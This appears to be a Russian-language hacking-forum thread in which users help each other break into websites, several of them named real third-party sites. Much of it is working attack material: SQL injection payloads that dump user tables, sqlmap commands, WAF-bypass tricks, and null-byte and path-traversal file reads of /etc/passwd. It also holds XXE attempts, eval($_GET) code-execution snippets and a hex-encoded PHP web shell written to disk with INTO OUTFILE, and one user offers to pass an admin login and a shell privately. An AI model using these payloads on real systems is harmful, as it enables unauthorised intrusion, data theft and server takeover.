DezMond™ said:
↑ (https://antichat.live/posts/4017807/)
Помогите найти админку
www.culinair.net (http://www.culinair.net)
www.slijtersvakblad.nl (http://www.slijtersvakblad.nl)
это не адмика
www.slijtersvakblad.nl/manager/ (http://www.slijtersvakblad.nl/manager/)


http://www.culinair.net/index.php?action=login

Логин/пароль админа и шел отправлю в ЛС

DezMond™ said:
↑ (https://antichat.live/posts/4017807/)
это не адмика
www.slijtersvakblad.nl/manager/ (http://www.slijtersvakblad.nl/manager/)


Как так? ЦМСка сайта - ModX же. (https://ru.wikibooks.org/wiki/MODx/%D0%9F%D0%B0%D0%BD%D0%B5%D0%BB%D1%8C_%D1%83%D0%BF% D1%80%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F)

Тренируюсь на локалхосте, Как удалять записи в бд через скулю стандартныи запрос некатит?

BabaDook said:
↑ (https://antichat.live/posts/4019058/)
ты после банков стал локалхост ломать??
без прав никак


Права рута там может енкод нужен или как?

http://localhost/search.php?c=-9999'+AND+DELETE+*+FROM+product+WHERE+id=4+--+

Octavian said:
↑ (https://antichat.live/posts/4019065/)
Права рута там может енкод нужен или как?
http://localhost/search.php?c=-9999'+AND+DELETE+*+FROM+product+WHERE+id=4+--+


мде, нельзя делать выборку и дропать записи, операции select/update/delete не совместимы, найдешь зеродей - не забудь отписаться

t0ma5 said:
↑ (https://antichat.live/posts/4019210/)
мде, нельзя делать выборку и дропать записи, операции select/update/delete не совместимы, найдешь зеродей - не забудь отписаться


А в каких случаях это возможно можно пример?

Octavian said:
↑ (https://antichat.live/posts/4019225/)
А в каких случаях это возможно можно пример?


вообще ответ был строго булевый, нет таких случаев

есть мульти запросы "select * from table;delete from table", но здесь запросы разделены, это не один запрос

BabaDook said:
↑ (https://antichat.live/posts/4019587/)
Инклут


Да он добавляет к параметру .html что можно сделать?

BabaDook said:
↑ (https://antichat.live/posts/4019603/)
Пробовать откинуть


Откидывать ".html" получается,но проблема я как понял что присваевается в начале еще и "pages" include_once(pages/БлаБла.html)

BabaDook said:
↑ (https://antichat.live/posts/4019628/)
Зачем вы задаёте вопросы если знайте ответ?


Есть ли способ проинклудить если перед кодом стоит pages/?

BabaDook said:
↑ (https://antichat.live/posts/4019649/)
что за код ?


В смысле мой внедряемый код,допустим сайт.

Я допустим пишу "www.ВасяПупкин.ru (http://www.ВасяПупкин.ru)" в параметр pages

Получается так www.Сайт.com/index.php?Id=pages&pages= (http://www.xn--80aswg.com/index.php?Id=pages&pages=)www.ВасяПупкин.ru (http://www.ВасяПупкин.ru)

Выводится ошибкаinclude_once(pages/www.ВасяПупкин.ru (http://www.ВасяПупкин.ru)) failed to open stream: No such file or directory

BabaDook said:
↑ (https://antichat.live/posts/4019653/)
у вас не отработает, вам надо откидывать хтмл. не факт что у вас рфи


Вот что выдает с откинутой .html

include_once(): Failed opening 'pages/http://www.ВасяПупкин.r (http://www.xn--80adthqjaot2j.ru/)u' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')

попробуй для начало просто так отсеч с нулбайтом www.Сайт.com/index.php?Id=pages&pages= (http://www.xn--80aswg.com/index.php?Id=pages&pages=)../../../etc/passwd%00

shell_c0de said:
↑ (https://antichat.live/posts/4019667/)
попробуй для начало просто так отсеч с нулбайтом
www.Сайт.com/index.php?Id=pages&pages= (http://www.xn--80aswg.com/index.php?Id=pages&pages=)
../../../etc/passwd%00


Выдает это

[phpBB Debug] PHP Warning: in file /var/ВасяПупкин.com/index.php on line 544:include_once(): Failed opening 'pages/../../../etc/passwd' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')

nik1201 said:
↑ (https://antichat.live/posts/4019669/)
Выдает это
[phpBB Debug] PHP Warning
: in file
/var/ВасяПупкин.com/index.php
on line
544
:
include_once(): Failed opening 'pages/../../../etc/passwd' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')


Да кидаи ты URL 100 смс 100 строк мусора

Картинка же удаленная инжектится же

www.Сайт.com/index.php?Id=pages&pages= (http://www.xn--80aswg.com/index.php?Id=pages&pages=)%00

Через теги коды выполняются,кроме php

nik1201 said:
↑ (https://antichat.live/posts/4019707/)
Картинка же удаленная инжектится же
www.Сайт.com/index.php?Id=pages&pages= (http://www.xn--80aswg.com/index.php?Id=pages&pages=)
%00
Через теги коды выполняются,кроме php


иди к гадалке, что ты от нас хочешь?

Всем привет пользователям. Есть ли тут такие "users" которые научат меня сливать БД с разных сайтов(и всё объяснит)? Очень буду благодарен!

RedFox223 said:
↑ (https://antichat.live/posts/4019959/)
Всем привет пользователям. Есть ли тут такие "users" которые научат меня сливать БД с разных сайтов(и всё объяснит)? Очень буду благодарен!


/forums/30/ (https://antichat.live/forums/30/)

pw0ned said:
↑ (https://antichat.live/posts/4019961/)
/forums/30/ (https://antichat.live/forums/30/)


Спасибо

Тут во втором примере ошибка?

http://2sql.ru/novosti/sql-limit/

SELECT UniversityName FROM Universities LIMIT 4, 6

не даст 4 5 6 запись?

Типо покажи 6 записеи начиная с 4?

А 4 это 5 потому что нумерация начинается с 0.Я прав?

подскажите пожалуйста как использовать данную уязвимость https://www.exploit-db.com/exploits/32479/


[+] Arbitrary Upload on BigDump v0.35b
[+] Date: 23/03/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage:
http://www.ozerov.de/bigdump/
[+] Contact:
felipe_andrian@hotmail.com (mailto:felipe_andrian@hotmail.com)
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: bigdump.php
[+] Version: v0.35b
[+] Exploit :
http://host/bigdump.php?start=
[+] PoC:
http://SERVER/bigdump.php?start=
Note: allows upload files and shells with tamperdate.

В одном сайте,который на Yii 1.1.14 в text=1'&type=0&view=search ( где кавычка ) можно крутить . Только вот не понимаю какие запросы составлять . Есть желающие помочь?

PHP Version 4.4.45

Curl 7.19.7

OpenSSL 1.0.1e-fips 11 Feb 2013

MySQL 5.1.59

---------------------------------------

Стандартная ошибка CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near и.т.д

BabaDook said:
↑ (https://antichat.live/posts/4020278/)
sqlmap не работает?


Параметры 'id' 'text' и.т.д воспринимает как за команду в консоли .

SaNDER said:
↑ (https://antichat.live/posts/4020293/)
Параметры 'id' 'text' и.т.д воспринимает как за команду в консоли .




Code:
sqlmap.py -u "http://site.ru/?text=1&type=0&view=search" --dbs

Подскажите. Из из майкрософт sql можно отдать команду в cmd?

swat_ said:
↑ (https://antichat.live/posts/4020185/)
подскажите пожалуйста как использовать данную уязвимость
https://www.exploit-db.com/exploits/32479/


up

не кто не сталкивался?

Всем привет. Лет пять не пользовала SQL инъекции, подзабыла все

Есть инъект вида http://сайт.ru/korzina'/

Извергает ошибку:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''korzina'' LIMIT 0, 1' at line 1 -

SELECT * FROM `tehnocity_menu` WHERE `sim_link`='korzina'' LIMIT 0, 1

Но как бы я дальше не ковыряла, ничего толком не выходит. Направьте в какую сторону копать.

Что пробовала:

Втыкала Юнион. Не проскакивает. Такое впечатление, что -- не отрабатывает вообще. Не отбрасывается хвост запроса хоть убей.

В общем на вас вся надежда

Вот пример http://stylesosh.ru/Orangevaya-tolstovka'/

Вот сайт на той же CMS и другой дырявый скрипт

http://www.pulverisator.ru/Trubki/?orderby=pric'e&par=dec (http://www.pulverisator.ru/Trubki/?orderby=pric%27e&par=dec)

palec2006 said:
↑ (https://antichat.live/posts/4020816/)

Code:
http://stylesosh.ru/Orangevaya-tolstovka'and+extractvalue(1,concat(0x3a,(version( ))))and'/


Code:
http://www.pulverisator.ru/Trubki'and+extractvalue(1,concat(0x3a,(version())) )and'/



Спасибо! В целом вижу, что работает, но никогда не пользовалась extractvalue. Как мне подставить запрос сюда? Если вместо version(), то пишет Only constant XPATH queries are supported

mlmeet said:
↑ (https://antichat.live/posts/4020860/)
Спасибо! В целом вижу, что работает, но никогда не пользовалась extractvalue. Как мне подставить запрос сюда? Если вместо version(), то пишет Only constant XPATH queries are supported


http://securityidiots.com/Web-Pentest/SQL-Injection/XPATH-Error-Based-Injection-Extractvalue.html

BabaDook said:
↑ (https://antichat.live/posts/4020870/)
http://securityidiots.com/Web-Pentest/SQL-Injection/XPATH-Error-Based-Injection-Extractvalue.html


Спасибо, уже разобралась))))

Ребята, как листать записи при такой инъекции? Что то совсем не получается

http://stylesosh.ru/Orangevaya-tols...cat(name),1,1024)from(tehnocity_user))))and '/ (http://stylesosh.ru/Orangevaya-tolstovka'and+extractvalue(2,concat(0x3a,(select+m id(group_concat(name),1,1024)from(tehnocity_user)) ))and'/)

XPATH syntax error: ':quest,' -

SELECT * FROM `tehnocity_menu` WHERE `sim_link`='Orangevaya-tolstovka'and+extractvalue(2,concat(0x3a,(select+m id(group_concat(name),1,1024)from(tehnocity_user)) ))and'' LIMIT 0, 1

Ясно как листать.. Там всего один юзер в этой таблице((((

/Orangevaya-tolstovka'and+extractvalue(1,concat(0x3a,(select+m id(group_concat

(user_id,0x3a,name,0x3a),1,1024)from(users)where(u ser_id)=(1))))and'/

http://stylesosh.ru/ (http://stylesosh.ru/Orangevaya-tolstovka'and+extractvalue(2,concat(0x3a,(select+m id(group_concat(name),1,1024)from(tehnocity_user)) ))and'/)Orangevaya-tolstovka'and+extractvalue(1,concat(0x3a,(select+m id(group_concat(0x3a,table_name,0x3a),1,1024)from( information_schema.tables))))and'/

Не пропускает точку((((((( Как быть????? Хексить пробовала, не выходит. Посоветуйте пожалуйста.

Попробовала сбрутить таблицы по словарю с античата.. Ничего нормального не удалось вытащить((

Что можно сделать с этим сайтом?

http://hotel-stalingrad.ru/index.php?page=cafe

У меня ничего не получается,кто подскажет с чего раскрутить можно?

nik1201 said:
↑ (https://antichat.live/posts/4021414/)
Что можно сделать с этим сайтом?
http://hotel-stalingrad.ru/index.php?page=cafe
У меня ничего не получается,кто подскажет с чего раскрутить можно?


null-byte там не работает, можно попробовать расширение отбросить через кучу слешей(2048/4096/etc), влом линк искать

t0ma5 said:
↑ (https://antichat.live/posts/4021467/)
null-byte там не работает, можно попробовать расширение отбросить через кучу слешей(2048/4096/etc), влом линк искать


работает, там другая проблема

BabaDook said:
↑ (https://antichat.live/posts/4021482/)
работает, там другая проблема


неа, не работает

я проверил подключив admin/index.php%00 - не подключился

admin/index - подключает

---------

в сообщении об ошибке вроде бы видно что да null отработал, но по факту не подключает, хз

в чем там может быть проблема?

t0ma5 said:
↑ (https://antichat.live/posts/4021484/)
неа, не работает
я проверил подключив admin/index.php%00 - не подключился
admin/index - подключает
---------
в сообщении об ошибке вроде бы видно что да null отработал, но по факту не подключает, хз
в чем там может быть проблема?


Точно .

t0ma5 said:
↑ (https://antichat.live/posts/4021484/)
неа, не работает
я проверил подключив admin/index.php%00 - не подключился
admin/index - подключает
---------
в сообщении об ошибке вроде бы видно что да null отработал, но по факту не подключает, хз
в чем там может быть проблема?


У меня даже admin/index - не подключает

nik1201 said:
↑ (https://antichat.live/posts/4021490/)
У меня даже admin/index - не подключает


потому что ../admin/index

php/ лишняя директория

BabaDook said:
↑ (https://antichat.live/posts/4021489/)
Точно .


джино хостинг кстати, у них какая то интересная настройка не то пых не то апач, пых наверно

Подскажите Blind SQL Injection на https://site.com/admin/login/ через post username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login Havij через https не работает Sqlmap не находит inj

да и не сильна я в нём( Может есть ещё какие нибудь проги для автоматизации,смогла только названии базы вытащить и всё((

madam said:
↑ (https://antichat.live/posts/4021501/)
Подскажите Blind SQL Injection на
https://site.com/admin/login/
через post username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login Havij через https не работает Sqlmap не находит inj
да и не сильна я в нём( Может есть ещё какие нибудь проги для автоматизации,смогла только названии базы вытащить и всё((


sqlmap находит, просто надо быть поприветливей с ним, он не проходимец)

t0ma5 said:
↑ (https://antichat.live/posts/4021502/)
sqlmap находит, просто надо быть поприветливей с ним, он не проходимец)


Вот я и говорю мож не те параметры задаю((

POST /admin/login/ HTTP/1.1

Cache-Control: no-cache

Referer: https://site.com/admin/login/

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36

Accept-Language: en-us,en;q=0.5

Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634

Host: site.com

Accept-Encoding: gzip, deflate

Content-Length: 80

Content-Type: application/x-www-form-urlencoded

username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login

sqlmap.py -u https://site.com/admin/login/ --data=username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP( 25))A))%2b%27&password=&login=Login --cookie=PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634 --random-agent

что тогда здесь не так?

madam said:
↑ (https://antichat.live/posts/4021505/)
Вот я и говорю мож не те параметры задаю((
POST /admin/login/ HTTP/1.1
Cache-Control: no-cache
Referer:
https://site.com/admin/login/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634
Host: site.com
Accept-Encoding: gzip, deflate
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login
sqlmap.py -u
https://site.com/admin/login/
--data=username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP( 25))A))%2b%27&password=&login=Login --cookie=PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634 --random-agent
что тогда здесь не так?


мде

для начала


Code:
sqlmap.py -u https://site.com/admin/login/ --data="username=ololo&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --random-agent -v 3 -p username --dbs

t0ma5 said:
↑ (https://antichat.live/posts/4021510/)
мде
для начала

Code:
sqlmap.py -u https://site.com/admin/login/ --data="username=ololo&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --random-agent -v 3 -p username --dbs



POST parameter 'username' is not injectable((

madam said:
↑ (https://antichat.live/posts/4021519/)
POST parameter 'username' is not injectable((


--prefix="'+" --suffix="+'" --technique=T

Всё равно ничего не находит((

задавай параметры пустые

BabaDook said:
↑ (https://antichat.live/posts/4021573/)
задавай параметры пустые


в смысле логин и пароль ,уже пыталась

'+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'

вот таким перебором вытащила имя базы

но вот sqlmap никак нехочет найти ihj

madam said:
↑ (https://antichat.live/posts/4021582/)
в смысле логин и пароль ,уже пыталась
'+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'
вот таким перебором вытащила имя базы
но вот sqlmap никак нехочет найти ihj


Должен sqlmap -u site.com/login/ --form пробуйте

BabaDook said:
↑ (https://antichat.live/posts/4021586/)
Должен sqlmap -u site.com/login/ --form пробуйте


--forms тоже нет((

sqlmap умеет загружать куки сам?может в этом проблема

А если нуль-байт экранируется (%00) то он должен в ошибке выглядеть так (\0.php) а если его нет в ошибке то он обрезает расширение?

Просто есть еще сайт одной популярной игры,там аналогичная ситуация как и с сайтом http://hotel-stalingrad.ru/index.php?page=cafe там так же инклудятся локальные файлы как и c этим сайтом


Code:
hotel-stalingrad.ru/index.php?page=../admin/index

На сайте игры стоит php 5.4.45 apache 2.2.2

Перечитал уже все сайты о php include так и ничего кроме нуль-байта и [4096] слешей не нашел.

Но я так понял что [4096] слешей не работают с php версией 5.4.45

nik1201 said:
↑ (https://antichat.live/posts/4021682/)
А если нуль-байт экранируется (%00) то он должен в ошибке выглядеть так (\0.php) а если его нет в ошибке то он обрезает расширение?
Просто есть еще сайт одной популярной игры,там аналогичная ситуация как и с сайтом
http://hotel-stalingrad.ru/index.php?page=cafe
там так же инклудятся локальные файлы как и c этим сайтом

Code:
hotel-stalingrad.ru/index.php?page=../admin/index

На сайте игры стоит php 5.4.45 apache 2.2.2
Перечитал уже все сайты о php include так и ничего кроме нуль-байта и [4096] слешей не нашел.
Но я так понял что [4096] слешей не работают с php версией 5.4.45


Ну не откинешь ты .php с этого и надо было начинать

madam said:
↑ (https://antichat.live/posts/4021505/)
Вот я и говорю мож не те параметры задаю((
POST /admin/login/ HTTP/1.1
Cache-Control: no-cache
Referer:
https://site.com/admin/login/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634
Host: site.com
Accept-Encoding: gzip, deflate
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login
sqlmap.py -u
https://site.com/admin/login/
--data=username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP( 25))A))%2b%27&password=&login=Login --cookie=PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634 --random-agent
что тогда здесь не так?


Cохрани все в файл и пробни sqlmap.py -r 'file.txt'

да всё равно [17:20:42] [WARNING] POST parameter 'username' is not injectable

какие только параметры не задавала((

VERSION 5.5.47-MariaDB

DB site_com

USER site_com

всё что узнала(

madam said:
↑ (https://antichat.live/posts/4021718/)
да всё равно [17:20:42] [WARNING] POST parameter 'username' is not injectable
какие только параметры не задавала((
VERSION 5.5.47-MariaDB
DB site_com
USER site_com
всё что узнала(


ты руками то пробовала, там есть вообще скуль?

если есть - изучай софт гадать тут долго можно почему не крутит

скуля есть что параметре username что в password

могу скинуть сайт, если подскажете

madam said:
↑ (https://antichat.live/posts/4021724/)
скуля есть что параметре username что в password
могу скинуть сайт, если подскажете


что мешает плодить посты в соседней теме, специально для SQLMAP'a? я чуть позже все удалю.

Я просто не понимаю как так выходит, вы узнали БД, значит парамервы заданы верно, вы должны задаться вопросм, почему дальше ничего нету, мождет запрет на селект, ваф итд . причин много,

BabaDook said:
↑ (https://antichat.live/posts/4021733/)
Я просто не понимаю как так выходит, вы узнали БД, значит парамервы заданы верно, вы должны задаться вопросм, почему дальше ничего нету, мождет запрет на селект, ваф итд . причин много,


узнала я их ручками,sqmap вообще не может найти ihj

Добрый день. Есть код.


PHP:
$filename=$_GET["down"];
$FileDir="http://".$resceptdir."/uploal/delivere/thumb/".$filename."";
header('Content-Type: application/force-download');
header("Content-Disposition: attachment; filename=".basename($FileDir));
readfile($FileDir);


Можно ли как-то обойти вот эту часть чтобы допустим указать путь до файла внутри текущей папки, а не на сайте?


PHP:
http://".$resceptdir."/uploal/delivere/thumb/

Так же есть код


PHP:
$username=$_GET["user"];
$username=preg_replace("/[^\\w_-]/","",$username);
$sql="SELECT * FROM users WHERE USERNAME='".$username."' AND PASSWORD='".$password."'";


Можно его как-то обойти и выполнить SQL Inj?

Подскажите, в kcfinder 3.0, есть ли способ залиться?

Есть доступ к phpmyadmin на котором крутится бд без логинов и паролей. Прав на запись и заливку файлов нет.

В html коде(через бд) заливается php но не обрабатывается. Только html

Думаю единственная возможность это указать(наобум) обращение к какому-либо файлу, который обработает и вернет результат.


Code:

Send these files:


Но есть ли еще варианты?

Muracha said:
↑ (https://antichat.live/posts/4022675/)
Есть доступ к phpmyadmin на котором крутится бд без логинов и паролей. Прав на запись и заливку файлов нет.
В html коде(через бд) заливается php но не обрабатывается. Только html
Думаю единственная возможность это указать(наобум) обращение к какому-либо файлу, который обработает и вернет результат.

Code:

Send these files:


Но есть ли еще варианты?


пробовать залить другие форматы php3,phtml,shtml?

или с .htaccess попробывать, вообще /threads/307894/ (https://antichat.live/threads/307894/)

qqq1457 said:
↑ (https://antichat.live/posts/4022686/)
пробовать залить другие форматы php3,phtml,shtml?
или с .htaccess попробывать, вообще
/threads/307894/ (https://antichat.live/threads/307894/)


Друг мой, дело не в расширении файлов, я об этой статье и способах обхода вкурсе.

Проблема в другом, что я не могу внедрить php скрипт в html файл, он его просто "проглатывает" хотя формат .php

Как обойти WAF если фильтрует слово from при такой подстановки:

+and+ascii(substring((select+table_name+from+infor mation_schema.

tables+limit+1,1),1,1 ))>0--

а так всё нормально:

+and+substring(version(),1,1)=5--

elvir said:
↑ (https://antichat.live/posts/4022800/)
Как обойти WAF если фильтрует слово from при такой подстановки:
+and+ascii(substring((select+table_name+from+infor mation_schema.
tables+limit+1,1),1,1 ))>0--
а так всё нормально:
+and+substring(version(),1,1)=5--


посмотри здесь /threads/56409/ (https://antichat.live/threads/56409/)

плпробывать разный регистр FRom,FrOm,и т.д или /*!from*/ может даже FRfromOM

qqq1457 said:
↑ (https://antichat.live/posts/4022813/)
посмотри здесь
/threads/56409/ (https://antichat.live/threads/56409/)


Можешь помочь по таргету?

Все же непонятно.

Загружаю php через phpmyadmin, который в свою очередь передает параметры на страницу .php

но скрипт не выполняется, а просто не появляется на странице, только если открыть исходную страницу и найти весь этот скрипт целиком в исходнике.

там запрет php_flag engine 0 скорее всего

Или то, что php код храниться в базе данных, а при выводе его на страницу сайта - он не исполняется обычными методами..тогда какими его можно исполнить, методом eval?

Имеется XXE в перле - парсер: XML::Simple

Права не рутовые, но с высокой группой. Проблема заключается в том, что как только пытаюсь прочитать какой-нить файл, и в нем имеются символы типа <>, парсер меня шлет далеко и надолго(

В случае с php можно враппером конвертнуть файл в base64, но в перле увы не катит. Возможно, у перла есть какой-нить аналогичный враппер?

http://opt.sila.by/img/files/file.php?tmpname=2270&filename=' (http://opt.sila.by/img/files/file.php?tmpname=2270&filename=%27)

есть ли смысл дальше ковырять?

Filipp said:
↑ (https://antichat.live/posts/4023879/)
Имеется XXE в перле - парсер: XML::Simple
Права не рутовые, но с высокой группой. Проблема заключается в том, что как только пытаюсь прочитать какой-нить файл, и в нем имеются символы типа <>, парсер меня шлет далеко и надолго(
В случае с php можно враппером конвертнуть файл в base64, но в перле увы не катит. Возможно, у перла есть какой-нить аналогичный враппер?


нет, враппера такого нет. стоит попробовать oob через ftp, http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html

yarbabin said:
↑ (https://antichat.live/posts/4023975/)
нет, враппера такого нет. стоит попробовать oob через ftp,
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html


Столкнулся с проблемой, парсер довольно древний, не поддерживает EXTERNAL ENTITY. Поднял у себя такое же окружение, даю ему такой xml:


HTML:

%student;
]>

Получаю ответ:


Code:
ex.xml:4: parser error : PEReference: %student; not found
%student;
^
ex.xml:6: parser error : Start tag expected, '





]>
&js;

В таком случае можно что-нибудь предпринять?

Filipp said:
↑ (https://antichat.live/posts/4024938/)
Столкнулся с проблемой, парсер довольно древний, не поддерживает EXTERNAL ENTITY. Поднял у себя такое же окружение, даю ему такой xml:

HTML:

%student;
]>

Получаю ответ:

Code:
ex.xml:4: parser error : PEReference: %student; not found
%student;
^
ex.xml:6: parser error : Start tag expected, '





]>
&js;

В таком случае можно что-нибудь предпринять?


ну а где у вас тег ?

yarbabin said:
↑ (https://antichat.live/posts/4025081/)
ну а где у вас тег ?


Это пример из документации. Я как только не пробовал, external entity отказывается обрабатывать. На парсере версии чуть повыше все пашет. Работает только если создать сущность и сослаться на нее в каком-нибудь теге

Используется следующее:


Code:
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))

PHP/5.3.10-1ubuntu3.25

Использую CVE-2012-1823

> Exploit completed, but no session started.

Порты открыты, в чем проблема?

Есть возможность записать в переменные произвольный текст.


Code:


Но вот проблема, max кол-во символов 15 на каждую переменную.

p.s

@`$c`- пробовал

15 символов для выполнения кода? /threads/307086/ (https://antichat.live/threads/307086/)

пробуй это

/threads/307086/#post-2929944 (https://antichat.live/threads/307086/)

qqq1457 said:
↑ (https://antichat.live/posts/4025493/)
15 символов для выполнения кода?
/threads/307086/ (https://antichat.live/threads/307086/)
пробуй это
/threads/307086/#post-2929944 (https://antichat.live/threads/307086/)


Написал же: @`$c`- пробовал

----------

Не актуально, нашел решения

qqq1457 said:
↑ (https://antichat.live/posts/4025509/)
мб
eval($_GET[1]); 15 символов


)

$mail = "eval($_GET[1]);"; - Так не будет работать

$mail = ""; $a1=eval($_GET[l]); echo "$a1"; - Так будет

----------

Не актуально, нашел решения

WallHack said:
↑ (https://antichat.live/posts/4025554/)
)
$mail = "eval($_GET[1]);"
; - Так не будет работать
$mail = ""; $a1=eval($_GET[l]); echo "$a1";
- Так будет
----------
Не актуально, нашел решения


рассказал бы что ли

BabaDook said:
↑ (https://antichat.live/posts/4025592/)
рассказал бы что ли


Как-то так


Code:

Добрый день.

Есть вот такой скрипт.


PHP:
$uploaddir='dir/';
$uploadfile=$uploaddir.basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) {
echo"good";
}



Есть ли возожность как-то обойти basename т.к. директории dir нету, то надо загрузить файл выше директорией)

Apache 2.2.22

phpMyAdmin 3.4.11.1 (есть доступ, без прав на создание бд и загрузку)

SquirrelMail 1.4.23

на ip видит около 5ти сайтов, имеем wordpress 4.4.2(wpscan - http://pastebin.com/WuysyCNL)

PHP/5.4.45-0+deb7u1

В http://site/phpmyadmin/setup/ могу создать сервер без проблем - http://imgur.com/a/SxnIN

Что можно осуществить с этим? Некоторые вещи пробовал, но хочу выслушать ваши предложения

Добрый подскажите как применить into outfile

При таком запросе:


Code:
http://localhost/'||(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select load_file(0x2f6574632f706173737764) from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'

Результат:
Duplicate entry 'root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin' for key 1

Как в таком запросе внедрить?

select '' into outfile '/var/www/html/UserFiles/shell.php'

http://localhost/'||(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select код шелла в hex from mysql.user into outfile '/var/www/html/UserFiles/shell.php') from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'

в твоем примере:

http://localhost/'||(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select 0x3C3F7068702073797374656D28245F4745545B22636D6422 5D293B203F3E from mysql.user into outfile '/var/www/html/UserFiles/shell.php') from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'

если current_user file_priv=Y

попробуй

qqq1457 said:
↑ (https://antichat.live/posts/4028624/)
http://localhost/'||(select
count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select код шелла в hex from mysql.user into outfile '/var/www/html/UserFiles/shell.php') from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'
в твоем примере:
http://localhost/'||(select
count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select 0x3C3F7068702073797374656D28245F4745545B22636D6422 5D293B203F3E from mysql.user into outfile '/var/www/html/UserFiles/shell.php') from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'
если current_user file_priv=Y
попробуй


Уже разобрался мои варианты не работали из-за того что там нет прав на запись((

На сайте имеется XSS. На сайте стоит бейзик авторизация ( .htpasswd )

Насколько реально получить Request > Authorization > value ?

http://image.prntscr.com/image/4a78b0c493aa4539b865d874fa9ac2d2.png

myblitz said:
↑ (https://antichat.live/posts/4029948/)
На сайте имеется XSS. На сайте стоит бейзик авторизация ( .htpasswd )
Насколько реально получить Request > Authorization > value ?
http://image.prntscr.com/image/4a78b0c493aa4539b865d874fa9ac2d2.png


не получится

Код:

$html = @file_get_contents($_GET['param'] . '?q=' . $q);

echo $html;

Могу передать любой param и $q, хочу прочитать конфиг движка. Но проблема, как видим, в том что добавляется '?q=' . $q к пути, следовательно путь становится не корректным. Что можно сделать?

Привет, есть blind sql inj, могу читать файлы, но факт в том, что не все, то-есть /etc/passwd, /etc/mysql/my.cnf/, /etc/hosts читаются без проблем, а вот файл index.php не хочет, и конфиги апача тоже не видит, хотя путь 100% верный, так-как есть phpinfo() файл и через него все видно.

ребзя, очень срочно требуется получить полный путь на сервере, есть sql shell...

UPD: Не актуально, нашел в логах одной из табл

weleor said:
↑ (https://antichat.live/posts/4030382/)
Привет, есть blind sql inj, могу читать файлы, но факт в том, что не все, то-есть /etc/passwd, /etc/mysql/my.cnf/, /etc/hosts читаются без проблем, а вот файл index.php не хочет, и конфиги апача тоже не видит, хотя путь 100% верный, так-как есть phpinfo() файл и через него все видно.


Читаешь с правами мускула (или какая там СУБД).

Чмоды выставлены так, что у мускула нет прав на чтение этих файлов.

Zmaster_ said:
↑ (https://antichat.live/posts/4030254/)
Код:
$html = @file_get_contents($_GET['param'] . '?q=' . $q);
echo $html;
Могу передать любой param и $q, хочу прочитать конфиг движка. Но проблема, как видим, в том что добавляется '?q=' . $q к пути, следовательно путь становится не корректным. Что можно сделать?


Читалка будет работать, если в $q передать по типу


Code:
/../../../../../etc/passwd

param=any

